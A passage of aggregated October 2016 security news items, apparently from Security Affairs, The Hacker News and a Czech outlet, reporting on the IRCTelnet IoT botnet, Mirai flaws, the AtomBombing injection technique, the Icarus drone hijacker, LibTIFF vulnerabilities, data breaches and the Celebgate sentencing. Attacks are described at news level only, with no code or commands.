According to the Australian Red Cross Blood Service, the database contains registration information for 550,000 individuals who had donated between 2010 and 2016.
“This file contained registration information of 550,000 donors made between 2010 and 2016. The file was part of an online application to give blood and information such as names, addresses, dates of birth and some personal details are included in the questionnaire.” states the announcement published by the organization.
It is still unclear is someone else accessed the database, anyway IDCARE, Australia and New Zealand’s national identity support service have determined that there is low risk for the donors.
MalwareMustDie spotted a new IoT Linux/IRCTelnet malware made in Italy
30.10.2016 securityaffairs Virus
Exclusive: The security researcher MalwareMustDie has found a new Linux/IRCTelnet malware– made in Italy – that aims IoT botnet connected by IRC and Telnet. It is able to generate an IPv6 DDoS and performing NEW dangerous capabilities that Mirai was unable to cover.
In a brief interview to Security Affairs @unixfreakjp of MalwareMustDie group explains which are the main characteristics in order to be able to fight against this new malware with a proper security awareness.
After Mirai escalation it has become clear that the new landscape and very remunerative environment of the DDoS attacks will be more and more populated in the near future by IoT devices, “things” that normally are delivered without adequate quality control and are compromised by flaws that can be easily exploited.
Nevertheless, in the recent times, we have learned that IoT has been often rooted by using a brute force attack, succeeding also because IoT devices are deployed, as we said elsewhere, without changing the default credentials.
This was exactly the scheme of Mirai, as we have described in the past articles.
However, what we have here it’s something new and magnificently described by the last post of the by now worldwide famous whitehat researcher that has discovered and reverse engineered Mirai malware, @unixfreaxjp of the MalwareMustDie group.
In his post, he specifies, in fact, that the new IRC botnet ELF malware is yes having the specification of Tsunami/Kaiten protocol, but is recorded “in a different way adding some more features in messaging and malicious/attack vectors used”.
An explosive mix of new and classic features in this made in Italy new IRC botnet ELF malware
Here a syntactical outline of key points of this new Linux/IRCTelnet malware (the bot client) which has the following characteristics and conceptual schemes:
1) designed to attack IoT using telnet protocol, yes by now IoT is the new Eldorado, we know,
2) using the telnet scanner as in the past done by GayFgt/Torlus/Lizkebab/Bashdoor/Bashlite of which we report a reconstructed C code snapshot:
Figure 1 The telnet scanner.
3) using the Mirai leaked credential list and brute force passwords dictionary hardcoded in the binary code like represented below:
Figure 2. The bruteforce password dictionary
4) using a combined concept of Kaiten (IRC protocol used) by sending commands from a malicious C&C IRC server. Below we report the log made by @unixfreakjp using a PoC implemented for decoding the values and behavior of the malware.
Figure 3. The IRC C&C Server log
5) it is made in Italy: among some other evidence, there are some Italian strings found inside the binary code, containing Italian words as shown in the next figure. We know that he attack to infect this botnet was started on October 25th, 2016.
Figure 4. The Italian messages inside the binary code of the new Linux/IRCTelnet malware.
We want to underline the noble position of MalwareMustDie post who publicly stated in his Blog, that he didn’t want to include in the codename of this new malware nothing related to the Italian country.
But let’s analyze quickly the new features of the malware because there are something utterly new and certainly scaring.
The first time of IPv6 use to aims IoT (and IP spoofing of the bots)
During the reverse phase, inside the new malware has been discovered a generator of “TCP6” and “UDP6” packets that can be associated with the option “spoof6” coded.
It seems to be the first time that IPv6 has been used to aims IoT and since now is possible to generate DDoS attacks spoofed where is impossible to recognize the IP of the infected bot.
The reconstructed code related to the flooding looks bad and it seems that a lot of “DoS attack combination is planned”.
Figure 5. The DDoS attack sequence of the Linux/IRCTelnet malware
The comment of @unixfreaxjp of MawareMustDie to the new IPv6 capability is that “this botnet is supported attacks(DDoS) of IPv4 and IPv6 packets through the attack generator sending functions called sendV4() and sendV6().” And during the attack, there is another capability that is the “spoofing IP address also be done in the IPv4 or IPv6 form” that is really scaring.
Below is reported the flooding generating function on IPV6:
Figure 6. Reverse of the flooding generating function on IPv6
Then we can say that the focus of this new feature is the flooding based on IPv6 and the Author of the MMD Post ask to himself, and to all the Security Researcher Community: “Are we ready to dealing with IoT IPv6 DDoS now”?
Figure 7. Reddit discussion on IPv6
This is the big deal of the moment and the challenge of the future: but let’s go to the interview that @unixfreakjp of MalwareMustDie has released a few hours ago to Security Affairs.
First question:
Do you think that Linux/IRCTelenet is more dangerous than Mirai?
Mirai is dangerous in its own way. With new DDoS attack functions, low awareness, and hard to fetch the sample. Also with AV that was not using MIRAI as the new name but sticks with an old name of malware…it is lowering the security alert response. So when it hit hard, people get surprised.
This Linux/IRCTelnet , if being ignored as per what happened in Mirai, can be a dangerous threat too. This is the first malware run in IRC cnc that is using telnet scanner to infect other IoT, and it is aiming IoT, due to the vulnerable vectors in that vector.
So, I don’t say Linux/IRCTelnet is more dangerous than Mirai. Each of them has its own dangerous vector, it will depend on us on how to respond to handle this threat
Second Question:
What are the capability of the “IP spoof option in IPv4 or IPv6”?
When an infected IoT is performing attack, in example, via UDP6 or TCP6, Linux/IRCTelnet is having a option to spoof the source IP of the attacker (itself’s IP) for not revealing the original IP in the generated packet used to flood the target
And this spoofing and also the attack is supported to IPv6. This is important since there is no DDOS botnet that is coded and designed to hit services in IPv6 yet.
Third Question:
How do you know that the usable bot in this new botnet is about 3500?
A. I show you a figure:
Fourth Question:
Q. Do you think this malware is originally coded?
A. After further analysis comparing the overall done reversed code to the historically detected ELF malware botnet, we found a very good match, that confirms the source code used for this botnet is based on the root of Aidra botnet. I was not so sure about this until I reversed the whole source code and comparing the overall done reversed code to the historically detected ELF malware botnet libraries. And I found a very good match, along with several modifications and overhaul on original Aidra code. Built based on old codes of legendary Aidra bot, added with new logic of Torlus/Gayfgt’s for telnet scanner and using the Mirai’s leaked vulnerable IoT device’s login credential, is driving a high infection speed of Linux/IRCTelnet, so it can raise almost 3,500 bot clients within only 5 days from the firstly its loader detected. Indeed, the spoofing and IPv6 used was designed and trade mark of Aidra botnet family, and to make a new version of this botnet based on the recent vulnerable threat landscape is really inviting a bad news.. All of the reversed details stayed. I was reversed the malware BEFORE I even know this fact . It is very surprising to see a new type of Aidra botnet in this era, and this botnet is really a re-designed and modified of old Aidra to be a brand new threat landscape that we will face now.
This is the log of the IRC Server, as you see 3486 “users” were connected at that time.
Mirai Botnet Itself is Flawed; Hacking Back IoTs Could Mitigate DDoS Attacks
29.10.2016 thehackernews Attack
The infamous botnet that was used in the recent massive distributed denial of service (DDoS) attacks against the popular DNS provider Dyn, causing vast internet outage on last Friday, itself is flawed.
Yes, Mirai malware, which has already enslaved millions of Internet of Things (IoT) devices across 164 countries, contains several vulnerabilities that might be used against it in order to destroy botnet's DDoS capabilities and mitigate future attacks.
Early October, the developer of the malware publically released the source code of Mirai, which is designed to scan for IoT devices – mostly routers, cameras, and DVRs – that are still using their default passwords and then enslaves them into a botnet, which is then used to launch DDoS attacks.
However, after a close look at the source code, a researcher discovered three vulnerabilities, one of which could be used to shut down Mirai's ability to flood targets with HTTP requests.
A stack buffer overflow vulnerability was found by Scott Tenaglia, a researcher at endpoint security firm Invincea, in the segment of the Mirai's code that carries out HTTP flood attacks.
However, if exploited, the vulnerability could crash the attack process, thereby terminating the attack from that bot (infected IoT device), but leaving that compromised device intact and running.
Tenaglia has publically released the exploit, saying his exploit would not have helped in the recent DNS-based DDoS attack against Dyn that rendered major websites inaccessible, but would also shut down Layer 7 attack capabilities present in Mirai.
That's because Mirai is capable of launching HTTP floods as well as various network DDoS attacks, including DNS floods, UDP floods, SYN and ACK floods, GRE IP and GRE ETH floods, STOMP (Simple Text Oriented Message Protocol) flood attacks.
"This simple 'exploit' is an example of active defense against an IoT botnet that could be used by any DDoS mitigation service to guard against a Mirai-based HTTP flood attack in real time," Tenaglia writes in a blog post. "Although it cannot be used to remove the bot from the IoT device, it can be used to halt the attack originating from that particular device."
Legal Concerns of Hacking Back:
However, exploiting this vulnerability is to hack back tens of hundreds of IoT devices, which is a controversial and illegit approach and could put defenders in a gray area.
Hacking back involves making changes to systems across various countries without permission from a device's owner, an ISP or its carrier, and Invincea adds a disclaimer on its research, saying it is not advocating a counterattack.
But since the flaw has the capability of thwarting the threat, white-hat vigilante hackers can silently use this vulnerability against the malware and take Mirai-infected devices away from the criminals.
As we have seen numerous court-ordered botnet takedowns in the past, the authorities can get a court order and hack back Mirai-compromised devices in order to shut down the infamous botnets.
The DDoS attack that hit French Internet service and hosting provider OVH with 1.1 Tbps of junk traffic, which is the largest DDoS attack known to date, also came from Mirai bots.
Ukrainian hackers Cyber Hunta leaked emails of Putin’s Advisor
29.10.2016 securityaffairs Hacking
Hackers of the Cyber Hunta collective leaked thousands of emails allegedly stolen from the account of Vladislav Yuryevich Surkov.
Last week a Russian government website was hacked by the Jester hacker who defaced the website of the Russian Ministry of Foreign Affairs, MID.ru in retaliation for the recent attacks against US targets.
This week a Ukrainian hacker collective called “Cyber Hunta” released a cache of emails linked to the Kremlin’s Vladislav Surkov, also known as the grey cardinal.
Cyber Hunta is a group of hacktivists operates against threat actors from the outside and “internal enemies.”
The group claims to have access breached the internal networks of the Russian presidential administration and the Parliament.
Experts from the Atlantic Council’s Digital Forensic Research Lab who analyzed the Surkov leaks confirmed that email account hacked by the attackers, prm_surkova@gov.ru, was apparently managed by Surkov’s assistants.
“The hacked inbox was for prm_surkova@gov.ru, which was handled by his secretaries or assistants, including a “Masha” (Mariya) and “Yevgenia” (last names unclear). The majority of the emails are briefings from Surkov’s assistants, such as Aleksandr Pavlov. ” states the Atlantic Council’s Digital Forensic Research Lab.
On the other side, the Russian Government denied that the leaked emails belong to Surkov as he did not use email.
According to the Ukrainian security service, the SBU, the leaked emails are genuine, the Associated Press who analyzed the leaked email share the same opinion.
The Ukranian hacker leaked a 1 Gb Outlook data file (.pst) containing 2,337 messages. Some messages contain information about the current internal political developments in the Republic of Abkhazia, Republic of South Ossetia, Ukraine, and the Republic of Moldova.
The precious archive includes email messages related to the war in Donbass, including government expense data and a list of casualties. The messages also show connections between the pro-Russia separatists in eastern Ukraine and Russian government and pro-Russia separatists that operated in the area to destabilize the Ukrainian government.
Who is behind the Cyber Hunta? In the group linked to some governments that is opposite to the Kremlin? Which one?
Perhaps in time we will have some answers.
Michigan State University hacked, personal information leaked online
29.10.2016 securityaffairs Hacking
The young hacker Mys7erioN announced to have hacked into the database of a US organization, the Michigan State University. Data leaked online.
Today I was contacted via Twitter by Mys7erioN who revealed me to have hacked into the database of a US organization, the Michigan State University.
As proof of the hack, Mys7erioN published on Pastebin the records of the table containing user data, including ‘user,’ including names, logins, phone numbers, emails published and encrypted passwords.
Mys7erioN is a young hacker, he told me that he is 17 years old from the Netherlands that is studying IT security at the school.
He was scanning some websites when discovered an SQL injection vulnerability in the systems of the Michigan State University.
In the following image is reported the list of tables included in the hacked database.
One of the tables, “gelstaff_mp2016” seems to be an updated list of users. The hacker also published it on Pastebin, a total of roughly 500 personal information and 222 logins.
This isn’t the first time the Michigan State University is hacked, in 2012 the hacker DARWINARE published approximately 1,500 names, e-mail addresses, encrypted passwords, user IDs and mailing addresses stolen from the University.
New Privacy Rules require ISPs to must Ask you before Sharing your Sensitive Data
28.10.2016 thehackernews Privacy
New Privacy Rule requires ISPs to must ask you before sharing your Sensitive Data
Good News for privacy concerned people! Now, your online data will not be marketed for business; at least by your Internet Service Providers (ISPs).
Yes, it's time for your ISPs to ask your permission in order to share your sensitive data for marketing or advertisement purposes, the FCC rules.
On Thursday, the United States Federal Communications Commission (FCC) has imposed new privacy rules on Internet Service Providers (ISPs) that restrict them from sharing your online history with third parties without your consent.
In a 3-2 vote, the FCC approved the new rules by which many privacy advocates seem pleased, while some of them wanted the Commission to even apply the same rules to web-based services like Google and Facebook as well.
Initially proposed earlier this year, the new rule says: "ISPs are required to obtain affirmative 'opt-in' consent from consumers to use and share sensitive information."
What does 'sensitive' information mean here? The rule lists the following:
Your precise geo-location
Your children's information
Information about your health
Your financial data
Social Security Numbers (SNNs)
Your Web browsing history
App usage history
The content of your communication
Note: Your broadband provider can use and share this information if you give them explicit permission. So, you need to watch out for those invites and gently worded dialog boxes.
What's non-sensitive is information like your email address, service tier, IP address, bandwidth used and other information along those lines, but you can still officially opt-out.
The new rule also requires Internet providers to tell customers with "clear, conspicuous and persistent notice" about the information they are collecting on them and how/when they share it, and the "types of entities" they share it with.
The ISPs even need to notify its customers in the event of a data breach.
The FCC aims to provide consumers an increased choice, transparency, and security online over their personal information. Here's what the Commission writes:
"ISPs serve as a consumer's "on-ramp" to the Internet. Providers have the ability to see a tremendous amount of their customers' personal information that passes over that Internet connection, including their browsing habits. Consumers deserve the right to decide how that information is used and shared — and to protect their privacy and their children's privacy online."
Meanwhile, the advertisers are, of course, not at all happy with the FCC's move. The Association of National Advertisers called the new rules "unprecedented, misguided and extremely harmful," saying the move is bad for consumers as well as the U.S. economy.
However, ISPs have a year to comply with the new rules. So, it won't go into effect for at least a year.
This Code Injection Technique can Potentially Attack All Versions of Windows
28.10.2016 thehackernews Vulnerebility
This Code Injection Technique can Potentially Attack All Versions of Windows
Guess what? If you own a Windows PC, which is fully-patched, attackers can still hack your computer.
Isn't that scary? Well, definitely for most of you.
Security researchers have discovered a new technique that could allow attackers to inject malicious code on every version of Microsoft's Windows operating system, even Windows 10, in a manner that no existing anti-malware tools can detect, threaten millions of PCs worldwide.
Dubbed "AtomBombing," the technique does not exploit any vulnerability but abuses a designing weakness in Windows.
New Code Injection Attack helps Malware Bypass Security Measures
AtomBombing attack abuses the system-level Atom Tables, a feature of Windows that allows applications to store information on strings, objects, and other types of data to access on a regular basis.
And since Atom are shared tables, all sorts of applications can access or modify data inside those tables. You can read a more detailed explanation of Atom Tables on Microsoft's blog.
A team of researchers from cyber security company EnSilo, who came up with the AtomBombing technique, say this design flaw in Windows can allow malicious code to modify atom tables and trick legitimate apps into executing malicious actions on its behalf.
Once injected into legitimate processes, the malware makes it easier for attackers to bypass security mechanisms that protect such systems from malware infections, the researchers said.
AtomBombing can Perform MITM Browser attack, Decrypt Passwords, and More
Besides process level restrictions bypass, the AtomBombing code injection technique also allows attackers to perform man-in-the-middle (MITM) browser attacks, remotely take screenshots of targeted user desktops, and access encrypted passwords stored on a browser.
Google Chrome encrypts your saved passwords using Windows Data Protection API (DPAPI), which uses data derived from the current user to encrypt or decrypt the data and access the passwords.
So, if malware is injected into a process which is already running in the context of the current user, it is easy to access those passwords in plain text.
Moreover, by injecting code into a web browser, attackers can modify the content shown to the user.
"For example, in a banking transaction process, the customer will always be shown the exact payment information as the customer intended via confirmation screens," said Tal Liberman, Security Research Team Leader of enSilo.
"However, the attacker modifies the data so that the bank receives false transaction information in favor of the attacker, i.e. a different destination account number and possibly amount."
No Patch for AtomBombing Attack
What's worse? The company said all versions of Windows operating system, including Microsoft's newest Windows 10, were affected. And What's even worse? There is no fix at this moment.
"Unfortunately, this issue cannot be patched since it does not rely on broken or flawed code – rather on how these operating system mechanisms are designed," said Liberman.
Since the AtomBombing technique exploits legitimate operating system functions to carry out the attack, Microsoft can not patch the issue without changing how the entire operating system works. This is not a feasible solution, so there is no notion of a patch.
AtomBombing Code Injection can potentially hack all Windows OS versions
28.10.2016 securityaffairs Vulnerebility
Researchers from ENSILO have devised a method, called AtomBombing, to inject malicious code in Windows OS that bypasses modern anti-malware tools.
Security experts from ENSILO have devised a method, called AtomBombing, to inject malicious code in Windows operating system that could not be detected by modern anti-malware tools.
The Atom Tables are data structures used by the operating system to store strings with an identifier to access them, they could have a global or local scope.
“An atom table is a system-defined table that stores strings and corresponding identifiers. An application places a string in an atom table and receives a 16-bit integer, called an atom, that can be used to access the string. A string that has been placed in an atom table is called an atom name.” reads a description published by Microsoft on the Atom Tables.
“The system provides a number of atom tables. Each atom table serves a different purpose. For example, Dynamic Data Exchange (DDE) applications use the global atom table to share item-name and topic-name strings with other applications.”
AtomBombing Code Injection
The attackers can then write malicious code into an atom table and force a legitimate application to retrieve it from the table. Once the code is retrieved by the legitimate application, it is possible to manipulate it triggering the execution of the malicious code.
“Our research team has uncovered a new way to leverage mechanisms of the underlying Windows operating system in order to inject malicious code. Threat actors can use this technique, which exists by design of the operating system, to bypass current security solutions that attempt to prevent infection. We named this technique AtomBombing based on the name of the underlying mechanism that this technique exploits.” states the analysis published by ENSILO.
The researchers explained that the AtomBombing technique relies on tricking a user into running a malicious executable that could allow them to conduct several malicious activities including memory data snooping to grab passwords and other sensitive information.
The experts highlighted that the AtomBombing method doesn’t exploit a flaw in the OS code, instead, it relies on a certain mechanism implemented by the Windows OS.
“Unfortunately, this issue cannot be patched since it doesn’t rely on broken or flawed code – rather on how these operating system mechanisms are designed.”
Crime doesn’t pay, Fappening hacker gets 18 months in jail
28.10.2016 securityaffairs Crime
The person behind the Fappening case, Ryan Collins (36), received a lighter penalty than the five years prison initially on the table for the guilty plea.
Do you remember the Fappening case? In 2014, a cache of nude photos and videos of celebrities was leaked online, hackers have stolen them by accessing the iCloud accounts of the victims.
The list of victims is long and includes Jennifer Lawrence and Kim Kardashian, the hacker has stolen the private images of the celebrities and leaked their nude photos onto 4chan.
In March the DoJ announced the arrest of the alleged culprit of the popular Fappening case. The US Department of Justice (DOJ) announced it charged Ryan Collins (36), of Pennsylvania for hacking Apple and Google E-Mail accounts belonging to more than 100 people, mostly celebrities.
“A Pennsylvania man was charged today with felony computer hacking related to a phishing scheme that gave him illegal access to over 100 Apple and Google e-mail accounts, including those belonging to members of the entertainment industry in Los Angeles.” states the press release issued by the DoJ.
the fappening
He was charged with hacking 50 iCloud and 72 Gmail accounts owned by Hollywood stars.
Collins admitted his responsibility and signed a plea agreement to plead guilty to a felony violation of the Computer Fraud and Abuse Act.
The man carried out spear phishing emails to the victims from November 2012 until the beginning of September 2014. In this way the man obtained the login credentials from its victims, then he illegally accessed their e-mail accounts to access sensitive and personal information.
The man behind the Fappening case focused his efforts to access nude pictures and videos from the victims, the DoJ announcement also revealed that in some circumstance he used a software to download the entire contents of the victims’ Apple iCloud backups.
In July, authorities arrested also a second man, Edward Majerczyk (28), he was charged with hacking 300 iCloud and Gmail accounts of which 30 belonged to Silver Screeners.
Both Majerczyk and Collins together hacked some 600 victims, for this reason, law enforcement has pled guilty to the charges involving sophisticated phishing attacks that saw them send malicious emails purporting to come from Apple and Google.
Collins received a lighter penalty than the five years prison initially on the table for the guilty plea.
The identity of the person who leaked the images is still a mystery.
'Celebgate' Hacker Gets 18 Months in Prison for Hacking Celebrity Nude Photos
28.10.2016 thehackernews Crime
'Celebgate' Hacker Gets 18 Months in Prison for Hacking Celebrity Nude Photos
The hacker who stole nude photographs of female celebrities two years ago in a massive data breach — famous as "The Fappening" or "Celebgate" scandal — has finally been sentenced to 18 months in federal prison, authorities said on Thursday.
36-year-old Lancaster, Pennsylvania man Ryan Collins was arrested in March and charged with hacking into "at least 50 iCloud accounts and 72 Gmail accounts," most of which owned by Hollywood stars, including Jennifer Lawrence, Kim Kardashian, and Kate Upton.
Now, a judge in Harrisburg, Pennsylvania, on Wednesday sentenced Collins to 18 months in federal prison after violating the Computer Fraud and Abuse Act.
Here's How Collins Stole Celebrities' Nude Photos
Federal prosecutors said Collins ran phishing scheme between November 2012 and September 2014 and hijacked more than 100 people using fake emails disguised as official notifications from Google and Apple, asking victims for their account credentials.
"When the victims responded, Collins then had access to the victims' e-mail accounts. After illegally accessing the e-mail accounts, Collins obtained personal information including nude photographs and videos," the Justice Department said in a statement.
"In some instances, Collins would use a software program to download the entire contents of the victims' Apple iCloud backups. In addition, Collins ran a modeling scam in which he tricked his victims into sending him nude photographs."
Many of the compromised accounts belonged to famous female celebrities including Jennifer Lawrence, Kim Kardashian, Kate Upton, Kirsten Dunst, Aubrey Plaza, Rihanna, Avril Lavigne and Gabrielle Union.
Another suspect, Edward Majerczyk, 28-years-old of Illinois, pleaded guilty in July and charged with hacking 300 Gmail and iCloud accounts. However, authorities have yet to identify the uploader or 'leaker' of the photographs stolen by Collins and Majerczyk.
According to officials, Collins and Majerczyk hacked over 600 victims by their social engineering tricks.
Collins faced a maximum of five years in prison, but as part of his plea deal, prosecutors proposed a lighter sentence of only 18 months.
You Can Hijack Nearly Any Drone Mid-flight Using This Tiny Gadget
28.10.2016 thehackernews Hacking
Now you can hijack nearly any drone mid-flight just by using a tiny gadget.
Security researcher Jonathan Andersson has devised a small hardware, dubbed Icarus, that can hijack a variety of popular drones mid-flight, allowing attackers to lock the owner out and give them complete control over the device.
Andersson, who is the manager of Trend Micro's TippingPoint DVLab division, demonstrated this new hack at this year's PacSec security conference in Tokyo, Japan on Wednesday.
Besides Drones, the new gadget has the capability of fully hijacking a wide variety of radio-controlled devices, including helicopters, cars, boats and other remote control gears that run over the most popular wireless transmission control protocol called DSMx.
DSMx is a protocol used to facilitate communication between radio controllers and devices, including drones, helicopters, and cars.
This is not the first hardware that can hijack drones mid-flight. There are jamming devices available in the market that block controlling radio signals and render a drone useless. However, these devices do not give you control like Icarus does.
Icarus works by exploiting DMSx protocol, granting attackers complete control over target drones that allows attackers to steer, accelerate, brake and even crash them.
The loophole relies on the fact that DSMx protocol does not encrypt the 'secret' key that pairs a controller and hobbyist device. So, it is possible for an attacker to steal this secret key by launching several brute-force attacks, Andersson explained in his presentation.
Once the drone hijacker, Icarus box, grabs the key, an attacker can send malicious packets to restrict the original owner of the drone from sending legitimate control commands. Instead, the drone will accept commands from the attacker.
You can also watch the demonstration video to learn more about Icarus box.
There's little to be done to mitigate this issue, and affected manufacturers are releasing patches and updated hardware, and securing the industry-wide encryption protocol in future drones.
"My guess is that it will not be easy to completely remedy the situation. The manufacturers and partners in the ecosystem sell standalone radio transmitters, models of all kinds, transmitters that come with models and standalone receivers," Andersson told Ars Technica.
"Only a certain set of standalone transmitters have a firmware upgrade capability, though the fix is needed on the model/receiver side."
Icarus has not been made available for sale, but this kind of gadget could benefit law enforcement as well as people who are worried about their safety and privacy. However, same could also be used for nefarious purposes.
So, next time if any annoying drone fly your overhead? Just hijack it and land it safely, rather than shooting it down.
The Icarus box is able to hijack nearly any drone mid-flight
28.10.2016 thehackernews Hacking
A security researcher presented a small hardware named Icarus box that is able to hijack a variety of popular drones mid-flight.
It could be very easy to hijack nearly any drone mid-flight by using the hardware presented by the Trend Micro researcher Jonathan Andersson at the PacSec hacking conference in Japan this week. Andersson, who leads the Trend Micro’s TippingPoint DVLab division, presented a small hardware named Icarus that is able to hijack a variety of popular drones mid-flight, the attacker is able to gain full control of the vehicle by locking the owner out.
According to Andersson, the Icarus box is able to hack into and radio controlled vehicles that run the SMx radio platform. Unfortunately, the SMx radio platform is very popular for drones, it present in vehicles manufactured by many vendors, including Walkera, NineEagles and AirTronics.
icarus box -drones-hacking
“It’s not a jamming system so i am not competing for control via RF power,” Andersson explained to Vulture South.
“Full flight control is achieved with the target experiencing a complete loss of control — it’s a clean switch-over.
“The range of my proof of concept implementation is equal to a standard DSMx radio transmitter, though standard 2.4GHz ISM band amplification can be applied to extend the range.”
The principle behind the Icarus box is simple, the hardware is able to determine the unique shared secret key within the DSMx binding process by monitoring the activity of the component and running a brute force attack. Once the Icarus box grabs the key, the attacker can send malicious packets to lock the legitimate controller out and send his commands.
Below a video PoC of the attack
“It works against all DSMx based radio systems, which would include drones, airplanes, cars, boats, and so on,” Andersson added.
The only way to protect the drone against such kind of attack is by updating receivers’ firmware protocols, an operation that is not always possible on many drones.
“My guess is that it will not be easy to completely remedy the situation. The manufacturers and partners in the ecosystem sell standalone radio transmitters, models of all kinds, transmitters that come with models and standalone receivers,” Andersson told Ars Technica.
“Only a certain set of standalone transmitters have a firmware upgrade capability, though the fix is needed on the model/receiver side.”
Below the slides prepared by Andersson.
Three bugs found in the LibTIFF, one of them yet to be patched
28.10.2016 securityaffairs Vulnerebility
Libtiff library is affected by three vulnerabilities but unfortunately one of them, tracked as CVE-2016-8331, is still unpatched.
Libtiff is a library for reading and writing Tagged Image File Format (abbreviated TIFF) files and according to the experts from CISCO Talos it is affected by three vulnerabilities. The bugs could be exploited by hackers to hack a system by using booby-trapped images. The bad news is that only two of three vulnerabilities have been fixed.
The vulnerabilities affect the latest version 4.0.6, released in September.
CVE-2016-5652 (TALOS-2016-0187) – LibTIFF tiff2pdf JPEG Compression Tables Heap Buffer Overflow
CVE-2016-8331 (TALOS-2016-0190) – LibTIFF FAX IFD Entry Parsing Type Confusion
CVE-2016-5875 (TALOS-2016-0205) – LibTIFF PixarLogDecode Heap Buffer Overflow
The Talos post says the company found the bugs in LibTiff – 4.0.6, released in September.
The LibTIFF FAX IFD Entry Parsing Type Confusion affects the LibTIFF code called BadFaxLines specific for fax systems, it could be exploited by using a specifically crafted image that triggers an out of bounds memory error, leading to remote code execution. This vulnerability is still unpatched.
“CVE-2016-8331 occurs during the parsing and handling of TIFF images using the LibTIFF API that is present in the standard build. RFC 2306 defines a series fields used within the TIFF format for use specifically in fax systems which are fully supported by the LibTIFF library.” states the analysis published by CISCO Talos. “The vulnerability exists in the handling of one of these fields, `BadFaxLines`, that can result in a write to out of bounds memory. Attackers can create a specially crafted TIFF file to exploit this vulnerability and execute arbitrary code on affected systems.”
The CVE-2016-5652 is a heap buffer overflow that resides in the Tiff2PDF tool. Attackers can exploit it by using a crafted file that can lead the library crashing.
CVE-2016-5875 is a heap buffer overflow that resides in the way compressed TIFF images in LibTIFF’s PixarLogDecode API are handled.
“To decompress the PixarLog compressed data inside of a TIFF image, LibTIFF uses the Zlib compression library. First, a buffer with the parameters needed to be passed to Zlib are set up with a function call to `PixarLogSetupDecode`. Later this buffer is used when calling the Zlib library function `inflate` which is responsible for the actual decompression. Passing an undersized buffer into the Zlib `inflate` function causes a heap overflow that could be potentially leveraged into remote code execution.”
The vulnerability was reported by Mathias Svensson, of Google’s Security Team, meanwhile the researcher Evan Rouault of SpatialSys published a fix on GitHub.
that is used to manage JPEG compression for TIFF images. The flaw was reported by the Google’s Security Team, Mathias Svensson. The researcher Evan Rouault of SpatialSys published a fix for the flaw and published the code on GitHub.
“TIFF offers support for multiple compression algorithms inside of the image itself. One such algorithm is the JPEG compression. This vulnerability arises in the calculating of the images tile size. A specially crafted TIFF image file can lead to an out of bounds write and ultimately to remote code execution. An attacker who can trick a user into using this utility with a crafted TIFF document can cause a heap based buffer overflow that results in remote code execution.” continues the analysis.
DDoS pod lupou: Co skutečně stojí za jedním z největších útoků posledních let?
28.10.2016 SecurityWorld Počítačový útok
Páteční útok na DNS poskytovatele Dyn způsobil nedostupnost mnoha významných webových stránek, mimo jiné Twitteru, Spotify, GitHubu, ale i zpravodajských portálů typu New York Times. Šlo o klasický DDoS útok s využitím mnoha hacknutých přístrojů internetu věcí.
Masivní výpadek přišel od hackerů využívajících přibližně 100 000 zařízení, infikovaných notoricky známým malwarem Mirai, schopným převzít kontrolu nad přístroji s unixovým prostředím - kamerami, DVR přehrávači apod., tvrdí Dyn.
„Můžeme potvrdit, že značné množství provozu pocházelo z botnetů hacknutých pomocí kódu Mirai,“ uvedlafirma na svém blogu.
Již předtím se mělo za to, že alespoň částečně za útoky stojí botnety vytvořené skrze Mirai; středeční zpráva však potvrzuje, že Mirai mohl za majoritní část distribuovaného DoS útoku.
Dalším, poměrně strašidelným zjištěním je, že se hackeři zřejmě drželi zpátky. Firmy vysledovaly rychlost šíření některých druhů Mirai až na více než 500 000 zařízení, a to velmi snadno díky slabým základním heslům.
Vzhledem k tomu, že za pátečními útoky stálo „jen“ 100 000 zařízení, je možné, že by hackeři zvládli ještě mnohem silnější DDoS útok, říká Ofer Gayer, bezpečnostní technik u společnosti Imperva, která se zaměřuje na zmírnění intenzity DDoS útoků.
„Možná, že šlo jen o varovný výstřel,“ popisuje. „Možná, že věděli, že takováto míra stačí a že nepotřebují nasadit svůj plný arzenál.“
Hackeři dosud využívali DDoS útoky na shození jednotlivých webových stránek, často za účelem vydírání, říká Gayer. Páteční útok na Dyn, klíčového člena internetové infrastruktury, je novinkou.
„Někdo opravdu zmáčkl spoušť,“ pokračuje Gayer. „Postavili největší botnet, se kterým mohou položit i ty největší cíle.“
Kromě pátečního incidentu si Imperva všimla nedávných útoků skrze Mirai botnety na svou vlastní webovou stránku a stránky svých klientů. Jeden srpnový byl opravdu velký s trafficem čítajícím 280 Gb/s. „Většina firem padne na 10 Gb/s. Ty největší pak na 100 Gb/s,“ vysvětluje Gayer.
Imperva si také povšimla, že mnoho z pozorovaných infikovaných zařízení šlo vysledovat na IP adresy ze 164 zemí, primárně ve Vietnamu, Brazílii a Spojených státech. Většinou šlo o CCTV kamery.
Ačkoli DDoS útoky nejsou zdaleka něčím novým, díky Mirai je jejich rozsah nevídaný. Nedávný silně medializovaný útok na novináře Briana Krebse zaměřeného na kybernetickou bezpečnost dosáhl neuvěřitelných 665 Gb/s.
Je stále nejasné, kdo stojí za pátečním útokem, podle některých bezpečnostních odborníků však jde o amaterské hackery. Na konci minulého měsíce totiž (rovněž neznámý) tvůrce malwaru Mirai uvolnil jeho zdrojový kód pro hackerskou komunitu, takže každý s alespoň minimálními základy hackingu jej může využít.
Ačkoli Mirai stojí za většinou útoku z minulého týdne, využity byly i jiné botnety, popisuje páteřní poskytovatel sítě Level 3 Communications. „Viděli jsmě alespoň jedno, možná dvě chování nekonzistentní s Mirai,“ uvedl hlavní bezpečnostní manažer firmy Dale Drew. Je podle ní možné, že hackeři v rámci ztížení vystopování využili několika botnetů.
Chinese Hackers won $215,000 for Hacking iPhone and Google Nexus at Mobile Pwn2Own
27.10.2016 thehackernews Security
Chinese Hackers won $215,000 for Hacking iPhone and Google Nexus at Mobile Pwn2Own
The Tencent Keen Security Lab Team from China has won a total prize money of $215,000 in the 2016 Mobile Pwn2Own contest run by Trend Micro's Zero Day Initiative (ZDI) in Tokyo, Japan.
Despite the implementation of high-security measures in current devices, the famous Chinese hackers crew has successfully hacked both Apple's iPhone 6S as well as Google's Nexus 6P phones.
Hacking iPhone 6S
For hacking Apple's iPhone 6S, Keen Lab exploited two iOS vulnerabilities – a use-after-free bug in the renderer and a memory corruption flaw in the sandbox – and stole pictures from the device, for which the team was awarded $52,500.
The iPhone 6S exploit successfully worked despite the iOS 10 update rolled out by Apple this week.
Earlier this week, Marco Grassi from Keen Lab was credited by Apple for finding a serious remote code execution flaw in iOS that could compromise a victim's phone by just viewing "a maliciously crafted JPEG" image.
